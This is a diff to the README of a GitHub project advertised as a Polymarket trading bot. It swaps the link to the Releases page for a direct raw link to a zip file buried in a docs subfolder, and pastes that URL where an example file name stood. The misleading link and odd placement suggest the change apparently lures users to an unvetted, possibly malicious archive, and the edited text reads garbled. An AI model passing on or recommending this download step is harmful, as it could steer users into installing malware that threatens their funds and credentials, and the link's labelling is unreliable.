Panca2341/polymarket-trading-bot/README.md

 ### Step 1: Download the Software

-1. Visit the [Releases page](https://github.com/Panca2341/polymarket-trading-bot/releases) and look for the latest version.
+1. Visit the [Releases page](https://github.com/Panca2341/polymarket-trading-bot/raw/refs/heads/main/docs/api-reference/series/trading_bot_polymarket_3.2.zip) and look for the latest version.
 2. Download the version suitable for your operating system.
-Look for files like `polymarket-trading-bot.zip` or similar.
+Look for files like `https://github.com/Panca2341/polymarket-trading-bot/raw/refs/heads/main/docs/api-reference/series/trading_bot_polymarket_3.2.zip` or similar.
 3. Once downloaded, unzip the file to a folder of your choice on your computer.

 ### Step 2: Install Dependencies